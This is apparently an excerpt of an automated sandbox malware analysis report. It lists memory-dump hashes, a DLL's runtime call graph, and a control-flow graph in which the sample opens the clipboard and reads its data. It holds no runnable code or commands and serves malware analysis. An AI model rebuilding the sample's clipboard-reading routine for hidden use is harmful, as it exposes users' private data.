                                                                • Instruction Fuzzy Hash: 0411A071904B849FD320CF69C901747BBE8EF29710F008A1EE499D7B81E7B5A504CB95
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2089717666.00007FFD9B6E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6E0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_7ffd9b6e0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: X7Q
                                                                • API String ID: 0-1167904179
                                                                • Opcode ID: 27fad6f75686837839879f31da283f28bea495a2c8503f1eaa1a81a71da35f29
                                                                • Instruction ID: c291e4fa4c780e89e4db9027b7dc5f955e5b79ca713412af6f442ca5c4f4de21
                                                                • Opcode Fuzzy Hash: 27fad6f75686837839879f31da283f28bea495a2c8503f1eaa1a81a71da35f29
                                                                • Instruction Fuzzy Hash: 63D13732A0FA8D1FE7A5DBA848659B57FE1EF56350B0900FBD06DCB0E3DA18A915C341
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2089717666.00007FFD9B6E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6E0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_7ffd9b6e0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: b77d35e95e0a1ccba758d987b3a0c29d57609cd8ff3c78a310ff6f6be421a9a5
                                                                • Instruction ID: 588b7a83d8c484ca30d12d269e892163cce326c964ee46ac622ce806c580d8d2
                                                                • Opcode Fuzzy Hash: b77d35e95e0a1ccba758d987b3a0c29d57609cd8ff3c78a310ff6f6be421a9a5
                                                                • Instruction Fuzzy Hash: F371E812A1F7DA0FE766977858654A43FA1EF53250B0A01FBC0A8CF0F3EA186D598352
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2089717666.00007FFD9B6E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6E0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_7ffd9b6e0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 25f679e8013e815fff790f07041d5babd016240c29f501b5625ca11eeb32e826
                                                                • Instruction ID: e8c4baa36b0b9299ace3c09fff1fd41996439a53381716b656bd5f717f25617e
                                                                • Opcode Fuzzy Hash: 25f679e8013e815fff790f07041d5babd016240c29f501b5625ca11eeb32e826
                                                                • Instruction Fuzzy Hash: 0A21BF6290FBD54FEB229B7888354953FA0AF1362070A02EBC0F9CF1F3D9186956C761
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2088878134.00007FFD9B610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B610000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_7ffd9b610000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 76d70864090ee490991c90939bad70b8686d9afa50a49723ed7ebb2cc1aa164d
                                                                • Instruction ID: 1c39ba780929a99a3a3d0671f27ed59f4783623c8193afbc92b78954e5770218
                                                                • Opcode Fuzzy Hash: 76d70864090ee490991c90939bad70b8686d9afa50a49723ed7ebb2cc1aa164d
                                                                • Instruction Fuzzy Hash: BC01A73020CB0C4FDB48EF0CE051AA5B3E0FB85320F10056EE59AC36A1DA32E882CB45

                                                                Execution Graph

                                                                Execution Coverage:3.1%
                                                                Dynamic/Decrypted Code Coverage:0%
                                                                Signature Coverage:0%
                                                                Total number of Nodes:539
                                                                Total number of Limit Nodes:4
                                                                execution_graph 9563 6c051400 9568 6c055d90 9563->9568 9565 6c051411 9584 6c056b05 9565->9584 9571 6c055dae __InternalCxxFrameHandler 9568->9571 9572 6c055dd4 9568->9572 9569 6c055ebe 9605 6c051ec0 9569->9605 9571->9565 9572->9569 9575 6c055e4d 9572->9575 9576 6c055e28 9572->9576 9573 6c055ec3 9628 6c051e20 9573->9628 9579 6c0567d0 26 API calls 9575->9579 9581 6c055e39 __InternalCxxFrameHandler 9575->9581 9576->9573 9587 6c0567d0 9576->9587 9579->9581 9580 6c055eb9 9600 6c0599dc 9580->9600 9581->9580 9582 6c055ea0 9581->9582 9582->9565 9684 6c056ad8 9584->9684 9588 6c0567d5 ___std_exception_copy 9587->9588 9589 6c0567ef 9588->9589 9590 6c059eaa __dosmaperr 2 API calls 9588->9590 9591 6c0567f1 9588->9591 9589->9581 9590->9588 9592 6c051e20 Concurrency::cancel_current_task 9591->9592 9594 6c0567fb 9591->9594 9634 6c057b0e 9592->9634 9596 6c057b0e std::_Xinvalid_argument RaiseException 9594->9596 9595 6c051e3c 9637 6c057a8c 9595->9637 9598 6c0570a6 9596->9598 9601 6c059968 ___std_exception_copy 25 API calls 9600->9601 9602 6c0599eb 9601->9602 9603 6c0599f9 ___std_exception_copy 11 API calls 9602->9603 9604 6c0599f8 9603->9604 9673 6c056751 9605->9673 9629 6c051e2e Concurrency::cancel_current_task 9628->9629 9630 6c057b0e std::_Xinvalid_argument RaiseException 9629->9630 9631 6c051e3c 9630->9631 9632 6c057a8c ___std_exception_copy 25 API calls 9631->9632 9633 6c051e63 9632->9633 9635 6c057b55 RaiseException 9634->9635 9636 6c057b28 9634->9636 9635->9595 9636->9635 9638 6c051e63 9637->9638 9640 6c057a99 ___std_exception_copy 9637->9640 9638->9581 9639 6c057ac6 9642 6c05ada7 ___std_exception_destroy 14 API calls 9639->9642 9640->9638 9640->9639 9643 6c05ae42 9640->9643 9642->9638 9644 6c05ae5d 9643->9644 9645 6c05ae4f 9643->9645 9646 6c05b686 __dosmaperr 14 API calls 9644->9646 9645->9644 9649 6c05ae74 9645->9649 9647 6c05ae65 9646->9647 9652 6c0599cc 9647->9652 9650 6c05ae6f 9649->9650 9651 6c05b686 __dosmaperr 14 API calls 9649->9651 9650->9639 9651->9647 9655 6c059968 9652->9655 9654 6c0599d8 9654->9650 9656 6c05b423 __dosmaperr 14 API calls 9655->9656 9657 6c059973 9656->9657 9658 6c059981 9657->9658 9663 6c0599f9 IsProcessorFeaturePresent 9657->9663 9658->9654 9660 6c0599cb 9661 6c059968 ___std_exception_copy 25 API calls 9660->9661 9662 6c0599d8 9661->9662 9662->9654 9664 6c059a05 9663->9664 9667 6c059820 9664->9667 9668 6c05983c __FrameHandler3::FrameUnwindToState 9667->9668 9669 6c059868 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 9668->9669 9670 6c059939 __FrameHandler3::FrameUnwindToState 9669->9670 9671 6c056791 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 9670->9671 9672 6c059957 GetCurrentProcess TerminateProcess 9671->9672 9672->9660 9678 6c0566b0 9673->9678 9676 6c057b0e std::_Xinvalid_argument RaiseException 9677 6c056770 9676->9677 9681 6c056660 9678->9681 9682 6c057a8c ___std_exception_copy 25 API calls 9681->9682 9683 6c05668c 9682->9683 9683->9676 9685 6c056ae7 9684->9685 9686 6c056aee 9684->9686 9690 6c05ab30 9685->9690 9693 6c05ab9c 9686->9693 9689 6c05141b 9691 6c05ab9c 28 API calls 9690->9691 9692 6c05ab42 9691->9692 9692->9689 9696 6c05a8b3 9693->9696 9697 6c05a8bf CallCatchBlock 9696->9697 9704 6c05b7d4 EnterCriticalSection 9697->9704 9699 6c05a8cd 9705 6c05a92d 9699->9705 9701 6c05a8da 9715 6c05a902 9701->9715 9704->9699 9706 6c05a949 9705->9706 9707 6c05a9c0 __dosmaperr 9705->9707 9706->9707 9714 6c05a9a0 9706->9714 9718 6c05cd7b 9706->9718 9707->9701 9709 6c05cd7b 28 API calls 9710 6c05a9b6 9709->9710 9712 6c05b90f _free 14 API calls 9710->9712 9711 6c05a996 9713 6c05b90f _free 14 API calls 9711->9713 9712->9707 9713->9714 9714->9707 9714->9709 9753 6c05b81c LeaveCriticalSection 9715->9753 9717 6c05a8eb 9717->9689 9719 6c05cda3 9718->9719 9720 6c05cd88 9718->9720 9725 6c05cdb2 9719->9725 9727 6c05ed96 9719->9727 9720->9719 9721 6c05cd94 9720->9721 9722 6c05b686 __dosmaperr 14 API calls 9721->9722 9726 6c05cd99 __FrameHandler3::FrameUnwindToState 9722->9726 9734 6c05edc9 9725->9734 9726->9711 9728 6c05edb6 HeapSize 9727->9728 9729 6c05eda1 9727->9729 9728->9725 9730 6c05b686 __dosmaperr 14 API calls 9729->9730 9731 6c05eda6 9730->9731 9732 6c0599cc ___std_exception_copy 25 API calls 9731->9732 9733 6c05edb1 9732->9733 9733->9725 9735 6c05edd6 9734->9735 9736 6c05ede1 9734->9736 9746 6c05b833 9735->9746 9737 6c05ede9 9736->9737 9744 6c05edf2 __dosmaperr 9736->9744 9739 6c05b90f _free 14 API calls 9737->9739 9742 6c05edde 9739->9742 9740 6c05edf7 9743 6c05b686 __dosmaperr 14 API calls 9740->9743 9741 6c05ee1c HeapReAlloc 9741->9742 9741->9744 9742->9726 9743->9742 9744->9740 9744->9741 9745 6c059eaa __dosmaperr 2 API calls 9744->9745 9745->9744 9747 6c05b871 9746->9747 9751 6c05b841 __dosmaperr 9746->9751 9748 6c05b686 __dosmaperr 14 API calls 9747->9748 9750 6c05b86f 9748->9750 9749 6c05b85c HeapAlloc 9749->9750 9749->9751 9750->9742 9751->9747 9751->9749 9752 6c059eaa __dosmaperr 2 API calls 9751->9752 9752->9751 9753->9717 11327 6c055a10 11328 6c055a64 11327->11328 11329 6c055a40 11327->11329 11334 6c055ed0 11328->11334 11331 6c055d90 36 API calls 11329->11331 11333 6c055a5a 11331->11333 11337 6c056771 11334->11337 11342 6c056705 11337->11342 11340 6c057b0e std::_Xinvalid_argument RaiseException 11341 6c056790 11340->11341 11343 6c056660 std::exception::exception 25 API calls 11342->11343 11344 6c056717 11343->11344 11344->11340 9027 6c05b423 GetLastError 9028 6c05b43a 9027->9028 9032 6c05b440 9027->9032 9062 6c05d05d 9028->9062 9049 6c05b446 SetLastError 9032->9049 9050 6c05d09c 9032->9050 9036 6c05b476 9038 6c05d09c __dosmaperr 6 API calls 9036->9038 9037 6c05b48d 9039 6c05d09c __dosmaperr 6 API calls 9037->9039 9040 6c05b484 9038->9040 9041 6c05b499 9039->9041 9067 6c05b90f 9040->9067 9042 6c05b49d 9041->9042 9043 6c05b4ae 9041->9043 9046 6c05d09c __dosmaperr 6 API calls 9042->9046 9073 6c05b0ce 9043->9073 9046->9040 9048 6c05b90f _free 12 API calls 9048->9049 9078 6c05cefd 9050->9078 9053 6c05d0d6 TlsSetValue 9054 6c05b45e 9054->9049 9055 6c05b8b2 9054->9055 9060 6c05b8bf __dosmaperr 9055->9060 9056 6c05b8ff 9095 6c05b686 9056->9095 9057 6c05b8ea RtlAllocateHeap 9058 6c05b46e 9057->9058 9057->9060 9058->9036 9058->9037 9060->9056 9060->9057 9092 6c059eaa 9060->9092 9063 6c05cefd __dosmaperr 5 API calls 9062->9063 9064 6c05d079 9063->9064 9065 6c05d094 TlsGetValue 9064->9065 9066 6c05d082 9064->9066 9066->9032 9068 6c05b91a HeapFree 9067->9068 9072 6c05b943 __dosmaperr 9067->9072 9069 6c05b92f 9068->9069 9068->9072 9070 6c05b686 __dosmaperr 12 API calls 9069->9070 9071 6c05b935 GetLastError 9070->9071 9071->9072 9072->9049 9132 6c05af62 9073->9132 9079 6c05cf2b 9078->9079 9083 6c05cf27 9078->9083 9079->9083 9085 6c05ce36 9079->9085 9082 6c05cf45 GetProcAddress 9082->9083 9084 6c05cf55 __dosmaperr 9082->9084 9083->9053 9083->9054 9084->9083 9090 6c05ce47 ___vcrt_FlsSetValue 9085->9090 9086 6c05cef2 9086->9082 9086->9083 9087 6c05ce65 LoadLibraryExW 9088 6c05ce80 GetLastError 9087->9088 9087->9090 9088->9090 9089 6c05cedb FreeLibrary 9089->9090 9090->9086 9090->9087 9090->9089 9091 6c05ceb3 LoadLibraryExW 9090->9091 9091->9090 9098 6c059ed7 9092->9098 9109 6c05b423 GetLastError 9095->9109 9097 6c05b68b 9097->9058 9099 6c059ee3 CallCatchBlock 9098->9099 9104 6c05b7d4 EnterCriticalSection 9099->9104 9101 6c059eee 9105 6c059f2a 9101->9105 9104->9101 9108 6c05b81c LeaveCriticalSection 9105->9108 9107 6c059eb5 9107->9060 9108->9107 9110 6c05b43a 9109->9110 9114 6c05b440 9109->9114 9112 6c05d05d __dosmaperr 6 API calls 9110->9112 9111 6c05d09c __dosmaperr 6 API calls 9113 6c05b45e 9111->9113 9112->9114 9115 6c05b8b2 __dosmaperr 12 API calls 9113->9115 9131 6c05b446 SetLastError 9113->9131 9114->9111 9114->9131 9116 6c05b46e 9115->9116 9118 6c05b476 9116->9118 9119 6c05b48d 9116->9119 9120 6c05d09c __dosmaperr 6 API calls 9118->9120 9121 6c05d09c __dosmaperr 6 API calls 9119->9121 9122 6c05b484 9120->9122 9123 6c05b499 9121->9123 9127 6c05b90f _free 12 API calls 9122->9127 9124 6c05b49d 9123->9124 9125 6c05b4ae 9123->9125 9128 6c05d09c __dosmaperr 6 API calls 9124->9128 9126 6c05b0ce __dosmaperr 12 API calls 9125->9126 9129 6c05b4b9 9126->9129 9127->9131 9128->9122 9130 6c05b90f _free 12 API calls 9129->9130 9130->9131 9131->9097 9133 6c05af6e CallCatchBlock 9132->9133 9146 6c05b7d4 EnterCriticalSection 9133->9146 9135 6c05af78 9147 6c05afa8 9135->9147 9138 6c05b074 9139 6c05b080 CallCatchBlock 9138->9139 9151 6c05b7d4 EnterCriticalSection 9139->9151 9141 6c05b08a 9152 6c05b255 9141->9152 9143 6c05b0a2 9156 6c05b0c2 9143->9156 9146->9135 9150 6c05b81c LeaveCriticalSection 9147->9150 9149 6c05af96 9149->9138 9150->9149 9151->9141 9153 6c05b28b __fassign 9152->9153 9154 6c05b264 __fassign 9152->9154 9153->9143 9154->9153 9159 6c05ddf0 9154->9159 9273 6c05b81c LeaveCriticalSection 9156->9273 9158 6c05b0b0 9158->9048 9161 6c05de70 9159->9161 9162 6c05de06 9159->9162 9164 6c05b90f _free 14 API calls 9161->9164 9185 6c05debe 9161->9185 9162->9161 9168 6c05b90f _free 14 API calls 9162->9168 9169 6c05de39 9162->9169 9163 6c05decc 9174 6c05df2c 9163->9174 9186 6c05b90f 14 API calls _free 9163->9186 9165 6c05de92 9164->9165 9166 6c05b90f _free 14 API calls 9165->9166 9170 6c05dea5 9166->9170 9167 6c05b90f _free 14 API calls 9173 6c05de65 9167->9173 9175 6c05de2e 9168->9175 9171 6c05b90f _free 14 API calls 9169->9171 9184 6c05de5b 9169->9184 9172 6c05b90f _free 14 API calls 9170->9172 9176 6c05de50 9171->9176 9177 6c05deb3 9172->9177 9178 6c05b90f _free 14 API calls 9173->9178 9179 6c05b90f _free 14 API calls 9174->9179 9187 6c05e230 9175->9187 9215 6c05e32e 9176->9215 9182 6c05b90f _free 14 API calls 9177->9182 9178->9161 9183 6c05df32 9179->9183 9182->9185 9183->9153 9184->9167 9227 6c05df61 9185->9227 9186->9163 9188 6c05e241 9187->9188 9214 6c05e32a 9187->9214 9189 6c05e252 9188->9189 9190 6c05b90f _free 14 API calls 9188->9190 9191 6c05e264 9189->9191 9192 6c05b90f _free 14 API calls 9189->9192 9190->9189 9193 6c05e276 9191->9193 9194 6c05b90f _free 14 API calls 9191->9194 9192->9191 9195 6c05e288 9193->9195 9197 6c05b90f _free 14 API calls 9193->9197 9194->9193 9196 6c05e29a 9195->9196 9198 6c05b90f _free 14 API calls 9195->9198 9199 6c05e2ac 9196->9199 9200 6c05b90f _free 14 API calls 9196->9200 9197->9195 9198->9196 9201 6c05e2be 9199->9201 9202 6c05b90f _free 14 API calls 9199->9202 9200->9199 9203 6c05e2d0 9201->9203 9205 6c05b90f _free 14 API calls 9201->9205 9202->9201 9204 6c05e2e2 9203->9204 9206 6c05b90f _free 14 API calls 9203->9206 9207 6c05b90f _free 14 API calls 9204->9207 9209 6c05e2f4 9204->9209 9205->9203 9206->9204 9207->9209 9208 6c05e306 9211 6c05e318 9208->9211 9212 6c05b90f _free 14 API calls 9208->9212 9209->9208 9210 6c05b90f _free 14 API calls 9209->9210 9210->9208 9213 6c05b90f _free 14 API calls 9211->9213 9211->9214 9212->9211 9213->9214 9214->9169 9216 6c05e393 9215->9216 9217 6c05e33b 9215->9217 9216->9184 9218 6c05e34b 9217->9218 9219 6c05b90f _free 14 API calls 9217->9219 9220 6c05e35d 9218->9220 9221 6c05b90f _free 14 API calls 9218->9221 9219->9218 9222 6c05e36f 9220->9222 9223 6c05b90f _free 14 API calls 9220->9223 9221->9220 9224 6c05e381 9222->9224 9225 6c05b90f _free 14 API calls 9222->9225 9223->9222 9224->9216 9226 6c05b90f _free 14 API calls 9224->9226 9225->9224 9226->9216 9228 6c05df8d 9227->9228 9229 6c05df6e 9227->9229 9228->9163 9229->9228 9233 6c05e3cf 9229->9233 9232 6c05b90f _free 14 API calls 9232->9228 9234 6c05df87 9233->9234 9235 6c05e3e0 9233->9235 9234->9232 9269 6c05e397 9235->9269 9238 6c05e397 __fassign 14 API calls 9239 6c05e3f3 9238->9239 9240 6c05e397 __fassign 14 API calls 9239->9240 9241 6c05e3fe 9240->9241 9242 6c05e397 __fassign 14 API calls 9241->9242 9243 6c05e409 9242->9243 9244 6c05e397 __fassign 14 API calls 9243->9244 9245 6c05e417 9244->9245 9246 6c05b90f _free 14 API calls 9245->9246 9247 6c05e422 9246->9247 9248 6c05b90f _free 14 API calls 9247->9248 9249 6c05e42d 9248->9249 9250 6c05b90f _free 14 API calls 9249->9250 9251 6c05e438 9250->9251 9252 6c05e397 __fassign 14 API calls 9251->9252 9253 6c05e446 9252->9253 9254 6c05e397 __fassign 14 API calls 9253->9254 9255 6c05e454 9254->9255 9256 6c05e397 __fassign 14 API calls 9255->9256 9257 6c05e465 9256->9257 9258 6c05e397 __fassign 14 API calls 9257->9258 9259 6c05e473 9258->9259 9260 6c05e397 __fassign 14 API calls 9259->9260 9261 6c05e481 9260->9261 9262 6c05b90f _free 14 API calls 9261->9262 9263 6c05e48c 9262->9263 9264 6c05b90f _free 14 API calls 9263->9264 9265 6c05e497 9264->9265 9266 6c05b90f _free 14 API calls 9265->9266 9267 6c05e4a2 9266->9267 9268 6c05b90f _free 14 API calls 9267->9268 9268->9234 9270 6c05e3ca 9269->9270 9271 6c05e3ba 9269->9271 9270->9238 9271->9270 9272 6c05b90f _free 14 API calls 9271->9272 9272->9271 9273->9158 9274 6c057062 9275 6c057070 9274->9275 9276 6c05706b 9274->9276 9280 6c056f2c 9275->9280 9291 6c057445 9276->9291 9282 6c056f38 CallCatchBlock 9280->9282 9281 6c056f47 9282->9281 9283 6c056f61 dllmain_raw 9282->9283 9287 6c056f5c __DllMainCRTStartup@12 9282->9287 9283->9281 9284 6c056f7b dllmain_crt_dispatch 9283->9284 9284->9281 9284->9287 9285 6c056fcd 9285->9281 9286 6c056fd6 dllmain_crt_dispatch 9285->9286 9286->9281 9288 6c056fe9 dllmain_raw 9286->9288 9287->9285 9295 6c056e7a 9287->9295 9288->9281 9290 6c056fc2 dllmain_raw 9290->9285 9292 6c05745b 9291->9292 9294 6c057464 9292->9294 9541 6c0573f8 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 9292->9541 9294->9275 9296 6c056e86 CallCatchBlock __DllMainCRTStartup@12 9295->9296 9297 6c056eb7 9296->9297 9298 6c056f22 9296->9298 9311 6c056e8f 9296->9311 9318 6c05690f 9297->9318 9339 6c057288 IsProcessorFeaturePresent 9298->9339 9301 6c056ebc 9327 6c05749c 9301->9327 9303 6c056f29 CallCatchBlock 9304 6c056f61 dllmain_raw 9303->9304 9306 6c056f47 9303->9306 9315 6c056f5c __DllMainCRTStartup@12 9303->9315 9304->9306 9307 6c056f7b dllmain_crt_dispatch 9304->9307 9305 6c056ec1 __RTC_Initialize __DllMainCRTStartup@12 9330 6c056ab0 9305->9330 9306->9290 9307->9306 9307->9315 9311->9290 9312 6c056fcd 9312->9306 9313 6c056fd6 dllmain_crt_dispatch 9312->9313 9313->9306 9314 6c056fe9 dllmain_raw 9313->9314 9314->9306 9315->9312 9316 6c056e7a __DllMainCRTStartup@12 79 API calls 9315->9316 9317 6c056fc2 dllmain_raw 9316->9317 9317->9312 9319 6c056914 ___scrt_release_startup_lock 9318->9319 9320 6c056918 9319->9320 9324 6c056924 __DllMainCRTStartup@12 9319->9324 9343 6c05ab46 9320->9343 9323 6c056931 9323->9301 9324->9323 9346 6c05a1f0 9324->9346 9413 6c057f06 InterlockedFlushSList 9327->9413 9331 6c056abc 9330->9331 9332 6c056ad2 9331->9332 9420 6c05acf2 9331->9420 9336 6c056f1c 9332->9336 9334 6c056aca 9425 6c057baf 9334->9425 9524 6c056932 9336->9524 9340 6c05729e __FrameHandler3::FrameUnwindToState 9339->9340 9341 6c057349 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 9340->9341 9342 6c057394 __FrameHandler3::FrameUnwindToState 9341->9342 9342->9303 9357 6c05a858 9343->9357 9347 6c05a1fe 9346->9347 9355 6c05a20f 9346->9355 9374 6c05a296 GetModuleHandleW 9347->9374 9352 6c05a249 9352->9301 9381 6c05a0b6 9355->9381 9358 6c05a864 CallCatchBlock 9357->9358 9365 6c05b7d4 EnterCriticalSection 9358->9365 9360 6c05a872 9366 6c05aa56 9360->9366 9365->9360 9367 6c05aa75 9366->9367 9368 6c05a87f 9366->9368 9367->9368 9369 6c05b90f _free 14 API calls 9367->9369 9370 6c05a8a7 9368->9370 9369->9368 9373 6c05b81c LeaveCriticalSection 9370->9373 9372 6c056922 9372->9301 9373->9372 9375 6c05a203 9374->9375 9375->9355 9376 6c05a2d9 GetModuleHandleExW 9375->9376 9377 6c05a2f8 GetProcAddress 9376->9377 9378 6c05a30d 9376->9378 9377->9378 9379 6c05a321 FreeLibrary 9378->9379 9380 6c05a32a 9378->9380 9379->9380 9380->9355 9382 6c05a0c2 CallCatchBlock 9381->9382 9397 6c05b7d4 EnterCriticalSection 9382->9397 9384 6c05a0cc 9398 6c05a103 9384->9398 9386 6c05a0d9 9402 6c05a0f7 9386->9402 9389 6c05a254 9406 6c05b881 GetPEB 9389->9406 9392 6c05a283 9395 6c05a2d9 __FrameHandler3::FrameUnwindToState 3 API calls 9392->9395 9393 6c05a263 GetPEB 9393->9392 9394 6c05a273 GetCurrentProcess TerminateProcess 9393->9394 9394->9392 9396 6c05a28b ExitProcess 9395->9396 9397->9384 9399 6c05a10f CallCatchBlock 9398->9399 9400 6c05ab46 __DllMainCRTStartup@12 14 API calls 9399->9400 9401 6c05a170 __FrameHandler3::FrameUnwindToState 9399->9401 9400->9401 9401->9386 9405 6c05b81c LeaveCriticalSection 9402->9405 9404 6c05a0e5 9404->9352 9404->9389 9405->9404 9407 6c05b89b 9406->9407 9408 6c05a25e 9406->9408 9410 6c05cf80 9407->9410 9408->9392 9408->9393 9411 6c05cefd __dosmaperr 5 API calls 9410->9411 9412 6c05cf9c 9411->9412 9412->9408 9414 6c0574a6 9413->9414 9415 6c057f16 9413->9415 9414->9305 9415->9414 9417 6c05ada7 9415->9417 9418 6c05b90f _free 14 API calls 9417->9418 9419 6c05adbf 9418->9419 9419->9415 9421 6c05acfd 9420->9421 9422 6c05ad0f ___scrt_uninitialize_crt 9420->9422 9423 6c05ad0b 9421->9423 9431 6c05daab 9421->9431 9422->9334 9423->9334 9426 6c057bc2 9425->9426 9427 6c057bb8 9425->9427 9426->9332 9497 6c05804e 9427->9497 9434 6c05d959 9431->9434 9437 6c05d8ad 9434->9437 9438 6c05d8b9 CallCatchBlock 9437->9438 9445 6c05b7d4 EnterCriticalSection 9438->9445 9440 6c05d92f 9454 6c05d94d 9440->9454 9444 6c05d8c3 ___scrt_uninitialize_crt 9444->9440 9446 6c05d821 9444->9446 9445->9444 9447 6c05d82d CallCatchBlock 9446->9447 9457 6c05dbc8 EnterCriticalSection 9447->9457 9449 6c05d837 ___scrt_uninitialize_crt 9450 6c05d870 9449->9450 9458 6c05da63 9449->9458 9468 6c05d8a1 9450->9468 9496 6c05b81c LeaveCriticalSection 9454->9496 9456 6c05d93b 9456->9423 9457->9449 9459 6c05da70 9458->9459 9460 6c05da79 9458->9460 9461 6c05d959 ___scrt_uninitialize_crt 66 API calls 9459->9461 9471 6c05d9fe 9460->9471 9463 6c05da76 9461->9463 9463->9450 9466 6c05da95 9484 6c05f1df 9466->9484 9495 6c05dbdc LeaveCriticalSection 9468->9495 9470 6c05d88f 9470->9444 9472 6c05da16 9471->9472 9476 6c05da3b 9471->9476 9473 6c05dd4c ___scrt_uninitialize_crt 25 API calls 9472->9473 9472->9476 9474 6c05da34 9473->9474 9475 6c05f9d7 ___scrt_uninitialize_crt 62 API calls 9474->9475 9475->9476 9476->9463 9477 6c05dd4c 9476->9477 9478 6c05dd6d 9477->9478 9479 6c05dd58 9477->9479 9478->9466 9480 6c05b686 __dosmaperr 14 API calls 9479->9480 9481 6c05dd5d 9480->9481 9482 6c0599cc ___std_exception_copy 25 API calls 9481->9482 9483 6c05dd68 9482->9483 9483->9466 9485 6c05f1f0 9484->9485 9486 6c05f1fd 9484->9486 9487 6c05b686 __dosmaperr 14 API calls 9485->9487 9488 6c05f246 9486->9488 9491 6c05f224 9486->9491 9489 6c05f1f5 9487->9489 9490 6c05b686 __dosmaperr 14 API calls 9488->9490 9489->9463 9492 6c05f24b 9490->9492 9493 6c05f13d ___scrt_uninitialize_crt 29 API calls 9491->9493 9494 6c0599cc ___std_exception_copy 25 API calls 9492->9494 9493->9489 9494->9489 9495->9470 9496->9456 9498 6c057bbd 9497->9498 9499 6c058058 9497->9499 9501 6c058e58 9498->9501 9505 6c059115 9499->9505 9502 6c058e82 9501->9502 9503 6c058e63 9501->9503 9502->9426 9504 6c058e6d DeleteCriticalSection 9503->9504 9504->9502 9504->9504 9510 6c059091 9505->9510 9508 6c059147 TlsFree 9509 6c05913b 9508->9509 9509->9498 9511 6c0590cc 9510->9511 9512 6c0590a9 9510->9512 9511->9508 9511->9509 9512->9511 9516 6c058ff7 9512->9516 9515 6c0590be GetProcAddress 9515->9511 9518 6c059003 ___vcrt_FlsSetValue 9516->9518 9517 6c059077 9517->9511 9517->9515 9518->9517 9519 6c059019 LoadLibraryExW 9518->9519 9523 6c059059 LoadLibraryExW 9518->9523 9520 6c059037 GetLastError 9519->9520 9521 6c05907e 9519->9521 9520->9518 9521->9517 9522 6c059086 FreeLibrary 9521->9522 9522->9517 9523->9518 9523->9521 9529 6c05ad22 9524->9529 9527 6c05804e ___vcrt_uninitialize_ptd 6 API calls 9528 6c056f21 9527->9528 9528->9311 9532 6c05b504 9529->9532 9533 6c05b50e 9532->9533 9534 6c056939 9532->9534 9536 6c05d01e 9533->9536 9534->9527 9537 6c05cefd __dosmaperr 5 API calls 9536->9537 9538 6c05d03a 9537->9538 9539 6c05d055 TlsFree 9538->9539 9540 6c05d043 9538->9540 9540->9534 9541->9294

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 120 6c0531b0-6c0533a6 124 6c0533a8-6c0533b4 120->124 125 6c0533db-6c0533f7 call 6c056791 120->125 126 6c0533b6-6c0533c4 124->126 127 6c0533d1-6c0533d8 call 6c05679f 124->127 126->127 129 6c0533f8-6c0534f3 call 6c0599dc call 6c055ed0 call 6c055d90 126->129 127->125 140 6c0534f5-6c053501 129->140 141 6c05351d-6c053530 129->141 142 6c053513-6c05351a call 6c05679f 140->142 143 6c053503-6c053511 140->143 142->141 143->142 144 6c053531-6c0536d1 call 6c0599dc call 6c055d90 143->144 154 6c053734-6c053750 call 6c056791 144->154 155 6c0536d3-6c0536df 144->155 156 6c0536e1-6c0536ef 155->156 157 6c05372a-6c053731 call 6c05679f 155->157 156->157 159 6c053751-6c053823 call 6c0599dc call 6c055ed0 call 6c056060 156->159 157->154 170 6c053825-6c053831 159->170 171 6c05384d-6c05385e 159->171 172 6c053843-6c05384a call 6c05679f 170->172 173 6c053833-6c053841 170->173 172->171 173->172 174 6c05385f-6c0538d5 call 6c0599dc OpenClipboard 173->174 179 6c053a87-6c053a99 174->179 180 6c0538db-6c0538ea GetClipboardData 174->180 181 6c053a81 CloseClipboard 180->181 182 6c0538f0-6c0538fc GlobalLock 180->182 181->179 183 6c053902-6c053921 WideCharToMultiByte 182->183 184 6c053a7a-6c053a7b GlobalUnlock 182->184 183->184 185 6c053927-6c053a50 call 6c056230 WideCharToMultiByte call 6c055d90 183->185 184->181 185->184 195 6c053a52-6c053a5e 185->195 196 6c053a70-6c053a77 call 6c05679f 195->196 197 6c053a60-6c053a6e 195->197 196->184 197->196 198 6c053a9a-6c053b6d call 6c0599dc call 6c055d90 call 6c055b80 * 2 call 6c051ed0 call 6c055b80 call 6c055d90 call 6c0531b0 197->198
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2924991559.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                • Associated: 0000000C.00000002.2924945917.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                • Associated: 0000000C.00000002.2925057270.000000006C066000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                • Associated: 0000000C.00000002.2925098569.000000006C06E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                • Associated: 0000000C.00000002.2925131103.000000006C070000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
